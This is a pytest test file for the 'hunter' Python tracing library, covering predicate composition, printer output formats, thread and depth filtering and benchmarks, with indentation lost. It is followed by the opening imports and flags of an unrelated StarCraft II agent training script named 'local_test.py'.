assert repr(Q(module='a')).endswith("predicates.Query: query_eq=(('module', 'a'),)>")
assert str(Q(module='a')) == "Query(module='a')"
assert "predicates.When: condition=<hunter." in repr(Q(module='a', action=C('foo')))
assert "predicates.Query: query_eq=(('module', 'a'),)>, actions=('foo',)>" in repr(Q(module='a', action=C('foo')))
assert str(Q(module='a', action=C('foo'))) == "When(Query(module='a'), 'foo')"
assert "predicates.Not: predicate=<hunter." in repr(~Q(module='a'))
assert "predicates.Query: query_eq=(('module', 'a'),)>>" in repr(~Q(module='a'))
assert str(~Q(module='a')) == "Not(Query(module='a'))"
assert "predicates.Or: predicates=(<hunter." in repr(Q(module='a') | Q(module='b'))
assert "predicates.Query: query_eq=(('module', 'a'),)>, " in repr(Q(module='a') | Q(module='b'))
assert repr(Q(module='a') | Q(module='b')).endswith("predicates.Query: query_eq=(('module', 'b'),)>)>")
assert str(Q(module='a') | Q(module='b')) == "Or(Query(module='a'), Query(module='b'))"
assert "predicates.And: predicates=(<hunter." in repr(Q(module='a') & Q(module='b'))
assert "predicates.Query: query_eq=(('module', 'a'),)>," in repr(Q(module='a') & Q(module='b'))
assert repr(Q(module='a') & Q(module='b')).endswith("predicates.Query: query_eq=(('module', 'b'),)>)>")
assert str(Q(module='a') & Q(module='b')) == "And(Query(module='a'), Query(module='b'))"
def test_predicate_q_deduplicate_callprinter():
out = repr(Q(CallPrinter(), action=CallPrinter()))
assert out.startswith('CallPrinter(')
def test_predicate_q_deduplicate_codeprinter():
out = repr(Q(CodePrinter(), action=CodePrinter()))
assert out.startswith('CodePrinter(')
def test_predicate_q_deduplicate_callprinter_cls():
out = repr(Q(CallPrinter(), action=CallPrinter))
assert out.startswith('CallPrinter(')
def test_predicate_q_deduplicate_codeprinter_cls():
out = repr(Q(CodePrinter(), action=CodePrinter))
assert out.startswith('CodePrinter(')
def test_predicate_q_deduplicate_callprinter_inverted():
out = repr(Q(CallPrinter(), action=CodePrinter()))
assert out.startswith('CallPrinter(')
def test_predicate_q_deduplicate_codeprinter_inverted():
out = repr(Q(CodePrinter(), action=CallPrinter()))
assert out.startswith('CodePrinter(')
def test_predicate_q_deduplicate_callprinter_cls_inverted():
out = repr(Q(CallPrinter(), action=CodePrinter))
assert out.startswith('CallPrinter(')
def test_predicate_q_deduplicate_codeprinter_cls_inverted():
out = repr(Q(CodePrinter(), action=CallPrinter))
assert out.startswith('CodePrinter(')
def test_predicate_q_action_callprinter():
out = repr(Q(action=CallPrinter()))
assert 'condition=<hunter.' in out
assert 'actions=(CallPrinter' in out
def test_predicate_q_action_codeprinter():
out = repr(Q(action=CodePrinter()))
assert 'condition=<hunter.' in out
assert 'actions=(CodePrinter' in out
def test_predicate_q_nest_1():
assert repr(Q(Q(module='a'))).endswith("predicates.Query: query_eq=(('module', 'a'),)>")
def test_predicate_q_not_callable():
exc = pytest.raises(TypeError, Q, 'foobar')
assert exc.value.args == ("Predicate 'foobar' is not callable.",)
def test_predicate_q_expansion():
assert Q(C(1), C(2), module=3) == And(C(1), C(2), Q(module=3))
assert Q(C(1), C(2), module=3, action=C(4)) == When(And(C(1), C(2), Q(module=3)), C(4))
assert Q(C(1), C(2), module=3, actions=[C(4), C(5)]) == When(And(C(1), C(2), Q(module=3)), C(4), C(5))
@pytest.fixture
def mockevent():
return hunter.Event(sys._getframe(0), 'line', None, hunter.Tracer())
def test_predicate_and(mockevent):
assert And(C(1), C(2)) == And(C(1), C(2))
assert Q(module=1) & Q(module=2) == And(Q(module=1), Q(module=2))
assert Q(module=1) & Q(module=2) & Q(module=3) == And(Q(module=1), Q(module=2), Q(module=3))
assert (Q(module=__name__) & Q(module='foo'))(mockevent) is False
assert (Q(module=__name__) & Q(function='mockevent'))(mockevent) is True
assert And(1, 2) | 3 == Or(And(1, 2), 3)
def test_predicate_or(mockevent):
assert Q(module=1) | Q(module=2) == Or(Q(module=1), Q(module=2))
assert Q(module=1) | Q(module=2) | Q(module=3) == Or(Q(module=1), Q(module=2), Q(module=3))
assert (Q(module='foo') | Q(module='bar'))(mockevent) == False
assert (Q(module='foo') | Q(module=__name__))(mockevent) == True
assert Or(1, 2) & 3 == And(Or(1, 2), 3)
def test_tracing_bare(LineMatcher):
lines = StringIO()
with hunter.trace(CodePrinter(stream=lines)):
def a():
return 1
b = a()
b = 2
try:
raise Exception('BOOM!')
except Exception:
pass
print(lines.getvalue())
lm = LineMatcher(lines.getvalue().splitlines())
lm.fnmatch_lines([
"*test_hunter.py* call def a():",
"*test_hunter.py* line return 1",
"*test_hunter.py* return return 1",
"* ... return value: 1",
])
def test_tracing_reinstall(LineMatcher):
lines = StringIO()
with hunter.trace(CodePrinter(stream=lines)):
def foo():
a = 2
sys.settrace(sys.gettrace())
a = 3
def bar():
a = 1
foo()
a = 4
bar()
print(lines.getvalue())
lm = LineMatcher(lines.getvalue().splitlines())
lm.fnmatch_lines([
"*test_hunter.py:* call def bar():",
"*test_hunter.py:* line a = 1",
"*test_hunter.py:* line foo()",
"*test_hunter.py:* call def foo():",
"*test_hunter.py:* line a = 2",
"*test_hunter.py:* line sys.settrace(sys.gettrace())",
"*test_hunter.py:* line a = 3",
"*test_hunter.py:* return a = 3",
"* ... return value: None",
"*test_hunter.py:* line a = 4",
"*test_hunter.py:* return a = 4",
"* ... return value: None",
])
def test_mix_predicates_with_callables():
hunter._prepare_predicate(Q(module=1) | Q(lambda: 2))
hunter._prepare_predicate(Q(lambda: 2) | Q(module=1))
hunter._prepare_predicate(Q(module=1) & Q(lambda: 2))
hunter._prepare_predicate(Q(lambda: 2) & Q(module=1))
hunter._prepare_predicate(Q(module=1) | (lambda: 2))
hunter._prepare_predicate((lambda: 2) | Q(module=1))
hunter._prepare_predicate(Q(module=1) & (lambda: 2))
hunter._prepare_predicate((lambda: 2) & Q(module=1))
def test_threading_support(LineMatcher):
lines = StringIO()
idents = set()
names = set()
started = threading.Event()
def record(event):
idents.add(event.threadid)
names.add(event.threadname)
return True
with hunter.trace(record,
actions=[CodePrinter(stream=lines), VarsPrinter('a', stream=lines), CallPrinter(stream=lines)],
threading_support=True):
def foo(a=1):
started.set()
print(a)
def main():
foo()
t = threading.Thread(target=foo)
t.start()
started.wait(10)
main()
lm = LineMatcher(lines.getvalue().splitlines())
assert idents - {t.ident} == {None}
assert 'MainThread' in names
assert any(name.startswith('Thread-') for name in names)
lm.fnmatch_lines_random([
'Thread-* *test_hunter.py:* call def foo(a=1):',
'Thread-* *test_hunter.py:* call [[]a => 1[]]',
'Thread-* *test_hunter.py:* call => foo(a=1)',
'Thread-* *test_hunter.py:* call [[]a => 1[]]',
'MainThread *test_hunter.py:* call def foo(a=1):',
'MainThread *test_hunter.py:* call [[]a => 1[]]',
'MainThread *test_hunter.py:* call => foo(a=1)',
'MainThread *test_hunter.py:* call [[]a => 1[]]',
])
@pytest.mark.parametrize('query', [{'threadid': None}, {'threadname': 'MainThread'}])
def test_thread_filtering(LineMatcher, query):
lines = StringIO()
idents = set()
names = set()
started = threading.Event()
def record(event):
idents.add(event.threadid)
names.add(event.threadname)
return True
with hunter.trace(~Q(**query), record,
actions=[CodePrinter(stream=lines), VarsPrinter('a', stream=lines), CallPrinter(stream=lines)],
threading_support=True):
def foo(a=1):
started.set()
print(a)
def main():
foo()
t = threading.Thread(target=foo)
t.start()
started.wait(10)
main()
lm = LineMatcher(lines.getvalue().splitlines())
print(lines.getvalue())
assert None not in idents
assert 'MainThread' not in names
pprint(lm.lines)
lm.fnmatch_lines_random([
'Thread-* *test_hunter.py:* call def foo(a=1):',
'Thread-* *test_hunter.py:* call [[]a => 1[]]',
'Thread-* *test_hunter.py:* call => foo(a=1)',
'Thread-* *test_hunter.py:* call [[]a => 1[]]',
])
def test_tracing_printing_failures(LineMatcher):
lines = StringIO()
with trace(actions=[CodePrinter(stream=lines), VarsPrinter('x', stream=lines)]):
class Bad(object):
__slots__ = []
def __repr__(self):
raise RuntimeError("I'm a bad class!")
def a():
x = Bad()
return x
def b():
x = Bad()
raise Exception(x)
a()
try:
b()
except Exception as exc:
pass
lm = LineMatcher(lines.getvalue().splitlines())
print(lines.getvalue())
lm.fnmatch_lines([
"""*tests*test_hunter.py:* call class Bad(object):""",
"""*tests*test_hunter.py:* line class Bad(object):""",
"""*tests*test_hunter.py:* line def __repr__(self):""",
"""*tests*test_hunter.py:* return def __repr__(self):""",
"""* ... return value: *""",
"""*tests*test_hunter.py:* call def a():""",
"""*tests*test_hunter.py:* line x = Bad()""",
"""*tests*test_hunter.py:* line return x""",
"""*tests*test_hunter.py:* line [[]x => !!! FAILED REPR: RuntimeError("I'm a bad class!"*)[]]""",
"""*tests*test_hunter.py:* return return x""",
"""* ... return value: !!! FAILED REPR: RuntimeError("I'm a bad class!"*)""",
"""*tests*test_hunter.py:* call def b():""",
"""*tests*test_hunter.py:* line x = Bad()""",
"""*tests*test_hunter.py:* line raise Exception(x)""",
"""*tests*test_hunter.py:* line [[]x => !!! FAILED REPR: RuntimeError("I'm a bad class!"*)[]]""",
"""*tests*test_hunter.py:* exception raise Exception(x)""",
"""* ... exception value: !!! FAILED REPR: RuntimeError("I'm a bad class!"*)""",
"""*tests*test_hunter.py:* return raise Exception(x)""",
"""* ... return value: None""",
])
def test_tracing_vars(LineMatcher):
lines = StringIO()
with hunter.trace(actions=[VarsPrinter('b', stream=lines), CodePrinter(stream=lines)]):
def a():
b = 1
b = 2
return 1
b = a()
b = 2
try:
raise Exception('BOOM!')
except Exception:
pass
print(lines.getvalue())
lm = LineMatcher(lines.getvalue().splitlines())
lm.fnmatch_lines([
"*test_hunter.py* call def a():",
"*test_hunter.py* line b = 1",
"*test_hunter.py* line [[]b => 1[]]",
"*test_hunter.py* line b = 2",
"*test_hunter.py* line [[]b => 2[]]",
"*test_hunter.py* line return 1",
"*test_hunter.py* return [[]b => 2[]]",
"*test_hunter.py* return return 1",
"* ... return value: 1",
])
def test_tracing_vars_expressions(LineMatcher):
lines = StringIO()
with hunter.trace(actions=[VarsPrinter('Foo.bar', 'vars(Foo)', 'len(range(2))', 'Foo.__dict__["bar"]', stream=lines)]):
def main():
class Foo(object):
bar = 1
main()
print(lines.getvalue())
lm = LineMatcher(lines.getvalue().splitlines())
lm.fnmatch_lines_random([
'* [[]Foo.bar => 1[]]',
'* [[]vars(Foo) => *[]]',
'* [[]len(range(2)) => 2[]]',
'* [[]Foo.__dict__[[]"bar"[]] => 1[]]',
])
def test_trace_merge():
with hunter.trace(function='a'):
with hunter.trace(function='b'):
with hunter.trace(function='c'):
assert sys.gettrace().handler == When(Q(function='c'), CallPrinter)
assert sys.gettrace().handler == When(Q(function='b'), CallPrinter)
assert sys.gettrace().handler == When(Q(function='a'), CallPrinter)
def test_trace_api_expansion():
# simple use
with trace(function='foobar') as t:
assert t.handler == When(Q(function='foobar'), CallPrinter)
# 'or' by expression
with trace(module='foo', function='foobar') as t:
assert t.handler == When(Q(module='foo', function='foobar'), CallPrinter)
# pdb.set_trace
with trace(function='foobar', action=Debugger) as t:
assert str(t.handler) == str(When(Q(function='foobar'), Debugger))
# pdb.set_trace on any hits
with trace(module='foo', function='foobar', action=Debugger) as t:
assert str(t.handler) == str(When(Q(module='foo', function='foobar'), Debugger))
# pdb.set_trace when function is foobar, otherwise just print when module is foo
with trace(Q(function='foobar', action=Debugger), module='foo') as t:
assert str(t.handler) == str(When(And(
When(Q(function='foobar'), Debugger),
Q(module='foo')
), CallPrinter))
# dumping variables from stack
with trace(Q(function='foobar', action=VarsPrinter('foobar')), module='foo') as t:
assert str(t.handler) == str(When(And(
When(Q(function='foobar'), VarsPrinter('foobar')),
Q(module='foo'),
), CallPrinter))
with trace(Q(function='foobar', action=VarsPrinter('foobar', 'mumbojumbo')), module='foo') as t:
assert str(t.handler) == str(When(And(
When(Q(function='foobar'), VarsPrinter('foobar', 'mumbojumbo')),
Q(module='foo'),
), CallPrinter))
# multiple actions
with trace(Q(function='foobar', actions=[VarsPrinter('foobar'), Debugger]), module='foo') as t:
assert str(t.handler) == str(When(And(
When(Q(function='foobar'), VarsPrinter('foobar'), Debugger),
Q(module='foo'),
), CallPrinter))
def test_locals():
out = StringIO()
with hunter.trace(
lambda event: event.locals.get('node') == 'Foobar',
module='test_hunter',
function='foo',
action=CodePrinter(stream=out)
):
def foo():
a = 1
node = 'Foobar'
node += 'x'
a += 2
return a
foo()
assert out.getvalue().endswith("node += 'x'\n")
def test_fullsource_decorator_issue(LineMatcher):
out = StringIO()
with trace(kind='call', action=CodePrinter(stream=out)):
foo = bar = lambda x: x
@foo
@bar
def foo():
return 1
foo()
lm = LineMatcher(out.getvalue().splitlines())
lm.fnmatch_lines([
'* call @foo',
'* | @bar',
'* * def foo():',
])
def test_callprinter(LineMatcher):
out = StringIO()
with trace(action=CallPrinter(stream=out)):
foo = bar = lambda x: x
@foo
@bar
def foo():
return 1
foo()
lm = LineMatcher(out.getvalue().splitlines())
lm.fnmatch_lines([
'* call => <lambda>(x=<function *foo at *>)',
'* line foo = bar = lambda x: x',
'* return <= <lambda>: <function *foo at *>',
'* call => <lambda>(x=<function *foo at *>)',
'* line foo = bar = lambda x: x',
'* return <= <lambda>: <function *foo at *>',
'* call => foo()',
'* line return 1',
'* return <= foo: 1',
])
def test_callprinter_indent(LineMatcher):
from sample6 import bar
out = StringIO()
with trace(action=CallPrinter(stream=out)):
bar()
lm = LineMatcher(out.getvalue().splitlines())
lm.fnmatch_lines([
"*sample6.py:1 call => bar()",
"*sample6.py:2 line foo()",
"*sample6.py:5 call => foo()",
"*sample6.py:6 line try:",
"*sample6.py:7 line asdf()",
"*sample6.py:16 call => asdf()",
"*sample6.py:17 line raise Exception()",
"*sample6.py:17 exception ! asdf: (<*Exception'>, Exception(), <traceback object at *>)",
"*sample6.py:17 return <= asdf: None",
"*sample6.py:7 exception ! foo: (<*Exception'>, Exception(), <traceback object at *>)",
"*sample6.py:8 line except:",
"*sample6.py:9 line pass",
"*sample6.py:10 line try:",
"*sample6.py:11 line asdf()",
"*sample6.py:16 call => asdf()",
"*sample6.py:17 line raise Exception()",
"*sample6.py:17 exception ! asdf: (<*Exception'>, Exception(), <traceback object at *>)",
"*sample6.py:17 return <= asdf: None",
"*sample6.py:11 exception ! foo: (<*Exception'>, Exception(), <traceback object at *>)",
"*sample6.py:12 line except:",
"*sample6.py:13 line pass",
"*sample6.py:13 return <= foo: None",
"*sample6.py:2 return <= bar: None",
])
def test_source(LineMatcher):
calls = []
with trace(action=lambda event: calls.append(event.source)):
foo = bar = lambda x: x
@foo
@bar
def foo():
return 1
foo()
lm = LineMatcher(calls)
lm.fnmatch_lines([
' foo = bar = lambda x: x\n',
' @foo\n',
' return 1\n',
])
def test_wraps(LineMatcher):
calls = []
@hunter.wrap(action=lambda event: calls.append('%6r calls=%r depth=%r %s' % (event.kind, event.calls, event.depth, event.fullsource)))
def foo():
return 1
foo()
lm = LineMatcher(calls)
for line in calls:
print(repr(line))
lm.fnmatch_lines([
"'call' calls=0 depth=0 @hunter.wrap*",
"'line' calls=1 depth=1 return 1\n",
"'return' calls=1 depth=0 return 1\n",
])
for call in calls:
assert 'tracer.stop()' not in call
def test_wraps_local(LineMatcher):
calls = []
def bar():
for i in range(2):
return 'A'
@hunter.wrap(local=True, action=lambda event: calls.append(
'%06s calls=%s depth=%s %s' % (event.kind, event.calls, event.depth, event.fullsource)))
def foo():
bar()
return 1
foo()
lm = LineMatcher(calls)
for line in calls:
print(repr(line))
lm.fnmatch_lines([
' call calls=0 depth=0 @hunter.wrap*',
' line calls=? depth=1 return 1\n',
'return calls=? depth=0 return 1\n',
])
for call in calls:
assert 'for i in range(2)' not in call
assert 'tracer.stop()' not in call
@pytest.mark.skipif('os.environ.get("SETUPPY_CFLAGS") == "-DCYTHON_TRACE=1"')
def test_depth():
calls = []
tracer = hunter.trace(action=lambda event: calls.append((event.kind, event.module, event.function, event.depth)))
try:
def bar():
for i in range(2):
yield i
def foo():
gen = bar()
next(gen)
while True:
try:
gen.send('foo')
except StopIteration:
break
list(i for i in range(2))
x = [i for i in range(2)]
foo()
finally:
tracer.stop()
pprint(calls)
assert ('call', 'test_hunter', 'bar', 1) in calls
assert ('return', 'test_hunter', 'foo', 0) in calls
def test_source_cython(LineMatcher):
pytest.importorskip('sample5')
calls = []
from sample5 import foo
with trace(action=lambda event: calls.append(event.source)):
foo()
lm = LineMatcher(calls)
lm.fnmatch_lines([
'def foo():\n',
' return 1\n',
])
def test_fullsource(LineMatcher):
calls = []
with trace(action=lambda event: calls.append(event.fullsource)):
foo = bar = lambda x: x
@foo
@bar
def foo():
return 1
foo()
lm = LineMatcher(calls)
lm.fnmatch_lines([
' foo = bar = lambda x: x\n',
' @foo\n @bar\n def foo():\n',
' return 1\n',
])
def test_fullsource_cython(LineMatcher):
pytest.importorskip('sample5')
calls = []
from sample5 import foo
with trace(action=lambda event: calls.append(event.fullsource)):
foo()
lm = LineMatcher(calls)
lm.fnmatch_lines([
'def foo():\n',
' return 1\n',
])
def test_debugger(LineMatcher):
out = StringIO()
calls = []
class FakePDB:
def __init__(self, foobar=1):
calls.append(foobar)
def set_trace(self, frame):
calls.append(frame.f_code.co_name)
with hunter.trace(
lambda event: event.locals.get('node') == 'Foobar',
module='test_hunter',
function='foo',
actions=[CodePrinter,
VarsPrinter('a', 'node', 'foo', 'test_debugger', stream=out),
Debugger(klass=FakePDB, foobar=2)]
):
def foo():
a = 1
node = 'Foobar'
node += 'x'
a += 2
return a
foo()
print(out.getvalue())
assert calls == [2, 'foo']
lm = LineMatcher(out.getvalue().splitlines())
pprint(lm.lines)
lm.fnmatch_lines_random([
"* [[]test_debugger => <function test_debugger at *[]]",
"* [[]node => 'Foobar'[]]",
"* [[]a => 1[]]",
])
def test_custom_action():
calls = []
with trace(action=lambda event: calls.append(event.function), kind='return'):
def foo():
return 1
foo()
assert 'foo' in calls
def test_trace_with_class_actions():
with trace(CodePrinter):
def a():
pass
a()
def test_predicate_no_inf_recursion(mockevent):
assert Or(And(1)) == 1
assert Or(Or(1)) == 1
assert And(Or(1)) == 1
assert And(And(1)) == 1
predicate = Q(Q(lambda ev: 1, module='wat'))
print('predicate:', predicate)
predicate(mockevent)
def test_predicate_compression():
assert Or(Or(1, 2), And(3)) == Or(1, 2, 3)
assert Or(Or(1, 2), 3) == Or(1, 2, 3)
assert Or(1, Or(2, 3), 4) == Or(1, 2, 3, 4)
assert And(1, 2, Or(3, 4)).predicates == (1, 2, Or(3, 4))
assert repr(Or(Or(1, 2), And(3))) == repr(Or(1, 2, 3))
assert repr(Or(Or(1, 2), 3)) == repr(Or(1, 2, 3))
assert repr(Or(1, Or(2, 3), 4)) == repr(Or(1, 2, 3, 4))
def test_predicate_not(mockevent):
assert Not(1).predicate == 1
assert ~Or(1, 2) == Not(Or(1, 2))
assert ~And(1, 2) == Not(And(1, 2))
assert ~Not(1) == 1
assert ~Query(module=1) | ~Query(module=2) == Not(And(Query(module=1), Query(module=2)))
assert ~Query(module=1) & ~Query(module=2) == Not(Or(Query(module=1), Query(module=2)))
assert ~Query(module=1) | Query(module=2) == Or(Not(Query(module=1)), Query(module=2))
assert ~Query(module=1) & Query(module=2) == And(Not(Query(module=1)), Query(module=2))
assert ~(Query(module=1) & Query(module=2)) == Not(And(Query(module=1), Query(module=2)))
assert ~(Query(module=1) | Query(module=2)) == Not(Or(Query(module=1), Query(module=2)))
assert repr(~Or(1, 2)) == repr(Not(Or(1, 2)))
assert repr(~And(1, 2)) == repr(Not(And(1, 2)))
assert repr(~Query(module=1) | ~Query(module=2)) == repr(Not(And(Query(module=1), Query(module=2))))
assert repr(~Query(module=1) & ~Query(module=2)) == repr(Not(Or(Query(module=1), Query(module=2))))
assert repr(~(Query(module=1) & Query(module=2))) == repr(Not(And(Query(module=1), Query(module=2))))
assert repr(~(Query(module=1) | Query(module=2))) == repr(Not(Or(Query(module=1), Query(module=2))))
assert Not(Q(module=__name__))(mockevent) == False
def test_predicate_query_allowed():
pytest.raises(TypeError, Query, 1)
pytest.raises(TypeError, Query, a=1)
def test_predicate_when_allowed():
pytest.raises(TypeError, When, 1)
@pytest.mark.parametrize('expr,expected', [
({'module': 'test_hunter'}, True),
({'module': 'test_hunterr'}, False),
({'module': 'test_hunter.'}, False),
({'module_startswith': 'test'}, True),
({'module__startswith': 'test'}, True),
({'module_contains': 'test'}, True),
({'module_contains': 'foo'}, False),
({'module_endswith': 'foo'}, False),
({'module__endswith': 'hunter'}, True),
({'module_in': 'test_hunter'}, True),
({'module': 'abcd'}, False),
({'module': ['abcd']}, False),
({'module_in': ['abcd']}, False),
({'module_in': ['a', 'test_hunter', 'd']}, True),
({'module': 'abcd'}, False),
({'module_startswith': ('abc', 'test')}, True),
({'module_startswith': {'abc', 'test'}}, True),
({'module_startswith': ['abc', 'test']}, True),
({'module_startswith': ('abc', 'test')}, True),
({'module_startswith': ('abc', 'test')}, True),
({'module_startswith': ('abc', 'xyz')}, False),
({'module_endswith': ('abc', 'hunter')}, True),
({'module_endswith': {'abc', 'hunter'}}, True),
({'module_endswith': ['abc', 'hunter']}, True),
({'module_endswith': ('abc', 'hunter')}, True),
({'module_endswith': ('abc', 'hunter')}, True),
({'module_endswith': ('abc', 'xyz')}, False),
({'module': 'abc'}, False),
({'module_regex': r'(hunter|hunter.*)\b'}, False),
({'module_regex': r'(test|test.*)\b'}, True),
])
def test_predicate_matching(expr, mockevent, expected):
assert Query(**expr)(mockevent) == expected
@pytest.mark.parametrize('exc_type,expr', [
(TypeError, {'module_1': 1}),
(TypeError, {'module1': 1}),
(ValueError, {'module_startswith': 1}),
(ValueError, {'module_startswith': {1: 2}}),
(ValueError, {'module_endswith': 1}),
(ValueError, {'module_endswith': {1: 2}}),
(TypeError, {'module_foo': 1}),
(TypeError, {'module_a_b': 1}),
])
def test_predicate_bad_query(expr, exc_type):
pytest.raises(exc_type, Query, **expr)
def test_predicate_when(mockevent):
called = []
assert When(Q(module='foo'), lambda ev: called.append(ev))(mockevent) == False
assert called == []
assert When(Q(module=__name__), lambda ev: called.append(ev))(mockevent) == True
assert called == [mockevent]
called = []
assert Q(module=__name__, action=lambda ev: called.append(ev))(mockevent) == True
assert called == [mockevent]
called = [[], []]
predicate = (
Q(module=__name__, action=lambda ev: called[0].append(ev)) |
Q(module='foo', action=lambda ev: called[1].append(ev))
)
assert predicate(mockevent) == True
assert called == [[mockevent], []]
assert predicate(mockevent) == True
assert called == [[mockevent, mockevent], []]
called = [[], []]
predicate = (
Q(module=__name__, action=lambda ev: called[0].append(ev)) &
Q(function='mockevent', action=lambda ev: called[1].append(ev))
)
assert predicate(mockevent) == True
assert called == [[mockevent], [mockevent]]
def test_and_or_kwargs():
assert And(1, function=2) == And(1, Query(function=2))
assert Or(1, function=2) == Or(1, Query(function=2))
def test_proper_backend():
if os.environ.get('PUREPYTHONHUNTER') or platform.python_implementation() == 'PyPy':
assert 'hunter.tracer.Tracer' in repr(hunter.Tracer)
else:
assert 'hunter._tracer.Tracer' in repr(hunter.Tracer)
@pytest.fixture(params=['pure', 'cython'])
def tracer_impl(request):
if request.param == 'pure':
Tracer = pytest.importorskip('hunter.tracer').Tracer
elif request.param == 'cython':
Tracer = pytest.importorskip('hunter._tracer').Tracer
if Tracer is not hunter.Tracer:
pytest.skip("Not %s in this environment" % Tracer)
return Tracer
def _bulky_func_that_use_stdlib():
import difflib
a = list(map(str, range(500)))
b = list(map(str, range(0, 500, 2)))
list(difflib.unified_diff(a, b, 'a', 'b'))
def test_perf_filter(tracer_impl, benchmark):
t = tracer_impl()
@benchmark
def run():
output = StringIO()
with t.trace(Q(
Q(module='does-not-exist') | Q(module='does not exist'.split()),
action=CodePrinter(stream=output)
)):
_bulky_func_that_use_stdlib()
return output
assert run.getvalue() == ''
def test_perf_stdlib(tracer_impl, benchmark):
t = tracer_impl()
@benchmark
def run():
output = StringIO()
with t.trace(Q(
~Q(module_contains='pytest'),
~Q(module_contains='hunter'),
~Q(filename='<string>'),
~Q(filename=''),
stdlib=False,
action=CodePrinter(stream=output)
)):
_bulky_func_that_use_stdlib()
return output
assert run.getvalue() == ''
def test_perf_actions(tracer_impl, benchmark):
t = tracer_impl()
@benchmark
def run():
output = StringIO()
with t.trace(Q(
~Q(module_in=['re', 'sre', 'sre_parse']) & ~Q(module_startswith='namedtuple') & Q(kind='call'),
actions=[
CodePrinter(
stream=output
),
VarsPrinter(
'line',
stream=output
)
]
)):
_bulky_func_that_use_stdlib()
def test_clear_env_var(monkeypatch):
monkeypatch.setitem(os.environ, 'PYTHONHUNTER', '123')
assert os.environ.get('PYTHONHUNTER') == '123'
out = StringIO()
with trace(action=CallPrinter(stream=out), clear_env_var=True):
assert 'PYTHONHUNTER' not in os.environ
assert os.environ.get('PYTHONHUNTER') == None
@pytest.mark.skipif(sys.platform == 'win32', reason='no fork on windows')
@pytest.mark.parametrize('Action', [CodePrinter, CallPrinter])
@pytest.mark.parametrize('force_pid', [True, False])
def test_pid_prefix(LineMatcher, Action, force_pid, capfd):
def main():
a = 1
pid = os.fork()
if pid:
os.waitpid(pid, 0)
else:
os._exit(0) # child
with hunter.trace(actions=[Action(force_pid=force_pid, stream=sys.stdout),
VarsPrinter('a', force_pid=force_pid, stream=sys.stdout)],
stdlib=False,
threading_support=True):
main()
out, err = capfd.readouterr()
print('OUT', out)
print('ERR', err)
lm = LineMatcher(out.splitlines())
prefix = '[[]*[]] *' if force_pid else ''
lm.fnmatch_lines_random([
prefix + "MainThread *test_hunter.py:* line * a = 1",
prefix + "MainThread *test_hunter.py:* line * if pid:",
prefix + "MainThread *test_hunter.py:* line * [[]a => 1[]]",
prefix + "MainThread *test_hunter.py:* line * os.waitpid(pid, 0)",
"[[]*[]] *MainThread *test_hunter.py:* line * os._exit(0) # child",
"[[]*[]] *MainThread *test_hunter.py:* line * [[]a => 1[]]",
])
@pytest.mark.parametrize('depth', [2, 3, 4], ids='depth_lt={}'.format)
def test_depth_limit(LineMatcher, tracer_impl, depth):
buff = StringIO()
from sample7 import one
tracer = hunter.Tracer()
predicate = When(Q(depth_lt=depth), CallPrinter(stream=buff))
try:
tracer.trace(predicate)
one()
finally:
tracer.stop()
output = buff.getvalue()
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* call => one()",
"* line for i in range(1): # one",
"* line two()",
"* call => two()",
"* return <= two: None",
"* line for i in range(1): # one",
"* return <= one: None",
])
if depth < 3:
assert 'three' not in output
if depth < 4:
assert 'four' not in output
if depth < 5:
assert 'five' not in output
@pytest.mark.parametrize('depth', [2, 3, 4], ids='depth_lt={}'.format)
def test_depth_limit_integration(LineMatcher, depth):
hunter_env = "action=CallPrinter,depth_lt={!r},kind_in=['call','return'],stdlib=0".format(depth + 1)
output = subprocess.check_output(
['python', os.path.join(os.path.dirname(__file__), 'sample7.py')],
env=dict(os.environ, PYTHONHUNTER=hunter_env, COV_CORE_DATAFILE=''),
stderr=subprocess.STDOUT,
)
output = output.decode('utf8')
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* call * => one()",
"* call * => two()",
"* return * <= two: None",
"* return * <= one: None",
])
if depth < 3:
assert '=> three' not in output
if depth < 4:
assert '=> four' not in output
if depth < 5:
assert '=> five' not in output
def test_from_predicate(LineMatcher):
buff = StringIO()
from sample7 import one
with trace(From(Q(function='five'), CallPrinter(stream=buff))):
one()
output = buff.getvalue()
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* call => five()",
"* line for i in range(1): # five",
"* line return i",
"* return <= five: 0",
])
assert 'four' not in output
assert 'three' not in output
assert 'two' not in output
assert 'one' not in output
def test_from_predicate_line(LineMatcher):
buff = StringIO()
from sample7 import one
with trace(From(Q(fullsource_has='in_five'), CallPrinter(stream=buff), watermark=-1)):
one()
output = buff.getvalue()
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* line * for i in range(1): # five",
"* line * return i",
])
assert 'four' not in output
assert 'three' not in output
assert 'two' not in output
assert 'one' not in output
def test_from_predicate_no_predicate(LineMatcher):
buff = StringIO()
from sample7 import one
with trace(From(Q(function='five')), action=CallPrinter(stream=buff)):
one()
output = buff.getvalue()
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* call => five()",
"* line for i in range(1): # five",
"* line return i",
"* return <= five: 0",
])
assert 'four' not in output
assert 'three' not in output
assert 'two' not in output
assert 'one' not in output
def test_from_predicate_line_no_predicate(LineMatcher):
buff = StringIO()
from sample7 import one
with trace(From(Q(fullsource_has='in_five'), watermark=-1), action=CallPrinter(stream=buff)):
one()
output = buff.getvalue()
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* line * for i in range(1): # five",
"* line * return i",
])
assert 'four' not in output
assert 'three' not in output
assert 'two' not in output
assert 'one' not in output
|
local_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "-1"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import terran_source_agent
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from mini_network import MiniNetwork
from strategy.terran_agent import DummyTerran
from mapping_env import SimulatePlatform
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", False, "Whether to train agents.")
flags.DEFINE_bool("on_server", False, "Whether is running on server.")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
